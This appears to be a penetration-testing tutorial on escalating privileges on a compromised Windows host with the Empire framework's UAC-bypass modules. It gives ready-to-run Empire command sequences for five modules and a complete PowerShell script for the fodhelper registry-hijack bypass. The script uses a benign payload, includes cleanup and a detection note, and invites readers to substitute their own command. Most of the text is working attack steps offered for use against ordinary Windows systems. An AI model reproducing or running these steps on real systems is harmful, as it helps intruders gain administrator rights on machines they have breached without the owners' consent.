Bypass User Account Control using Empire
This is the fifth article in our Empire series; for the basic guide to Empire, click here.
In this article, we will learn to gain administrator privileges on a compromised host using Empire's various bypassuac post-exploitation modules. UAC stands for User Account Control. With UAC enabled, even a user who is a member of the local Administrators group normally runs with a filtered, standard-user token; the full administrator token is only handed out after the consent prompt. Windows tracks this with the integrity level of the process:
· System : services and the kernel-side components of Windows
· High : an elevated process running with the full administrator token
· Medium : standard user rights, and also the default for a non-elevated administrator
· Low : extremely restricted, used for sandboxed processes such as Protected Mode browsers
A UAC bypass is a way to get a high-integrity process from a medium-integrity one without the prompt being shown. Two things have to be true for any of the modules below to work: the current user must already be a member of the local Administrators group (a plain standard user has no elevated token to unlock), and the UAC level must not be "Always notify", except for the modules that are specifically built to survive that setting.
Empire reports this as the agent's high_integrity value, shown in the output of the info command: 0 for a medium-integrity agent and 1 for a high-integrity one. We try to reach 1. Let's start with the first module, bypassuac_env. As you can see in the image, we already have an Empire session with high_integrity 0, which means we do not have admin rights. So type the following set of commands to get administrator privileges:
usemodule privesc/bypassuac_env
set Listener http
execute
Executing the above module will give you a new session. Upon accessing that session you can see the high_integrity value has changed to 1, which means we now have administrator rights, just as shown in the image below:
Now, let's try another module, privesc/bypassuac_eventvwr. Its purpose is the same as before, i.e. to get administrator rights so we can attack more effectively. Again, as you can see, we have a session with high_integrity 0, which indicates we have no admin rights yet. So, run the following commands:
usemodule privesc/bypassuac_eventvwr
set Listener http
execute
As you can see, we have a new session with high_integrity 1, which confirms that we now have admin rights.
The next module we will use for the same purpose is privesc/bypassuac_fodhelper. Just like before, use the following set of commands:
usemodule privesc/bypassuac_fodhelper
set Listener http
execute
Once the module is executed, you will have a session with high_integrity 1, hence we have succeeded in attaining admin rights.
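To see what this kind of module does under the hood, here is the registry hijack behind the fodhelper technique as an added example (not from the original article, and not Empire's own module source). It assumes a Windows 10 host, a user in local Administrators and UAC below "Always notify", and it swaps the payload for a harmless PowerShell window that prints its own integrity label so the result can be checked by eye; Empire's module places its listener launcher in that same command value instead.

```powershell
# Added example, not Empire module code: the fodhelper.exe UAC bypass with a
# visible, harmless payload, followed by cleanup of the hijacked key.

# fodhelper.exe is an auto-elevating Windows binary that opens the ms-settings:
# protocol handler. It resolves that handler under HKCU first, which a
# medium-integrity user can write to, so whatever command is registered there
# runs inside the elevated process without a consent prompt.
$key = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'

# Payload: an elevated PowerShell window that shows its integrity label.
# Replace with your own command; this is only here so the effect is visible.
$payload = 'powershell.exe -NoExit -Command "whoami /groups | findstr Mandatory"'

# Register the handler. The empty DelegateExecute value is required, otherwise
# the shell ignores the (default) command and falls back to the real handler.
New-Item -Path $key -Force | Out-Null
New-ItemProperty -Path $key -Name 'DelegateExecute' -Value '' -Force | Out-Null
Set-ItemProperty -Path $key -Name '(default)' -Value $payload -Force

# Trigger the auto-elevating binary and give it a moment to spawn the payload.
Start-Process -FilePath "$env:windir\System32\fodhelper.exe"
Start-Sleep -Seconds 3

# Clean up: remove the hijack so it is not left behind as persistence and does
# not break the real Settings app handler for the user.
Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
```

The spawned window should print `Mandatory Label\High Mandatory Level`, the same condition Empire reports as high_integrity 1. Because the hijack lives entirely in HKCU, a defender looking for this technique watches for writes to `HKCU\Software\Classes\ms-settings\Shell\Open\command` followed by a fodhelper.exe launch, which is also why the cleanup step matters on an engagement.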
The next bypassuac module we will use is privesc/bypassuac_wscript. Similarly, to gain administrator privileges use the following commands:
usemodule privesc/bypassuac_wscript
set Listener http
execute
As you can see in the image, the new session we have gained has admin rights.
The last module we will use for the same purpose is privesc/bypassuac. Execute the following commands:
usemodule privesc/bypassuac
set Listener http
execute
As you can see in the image above, the new session has high_integrity 1, hence administrator rights have been gained. Each of these modules abuses a different auto-elevating Windows component, and several of them have been fixed in later Windows 10 builds, so if one fails on a target it is worth trying the others before moving on to another privilege-escalation technique.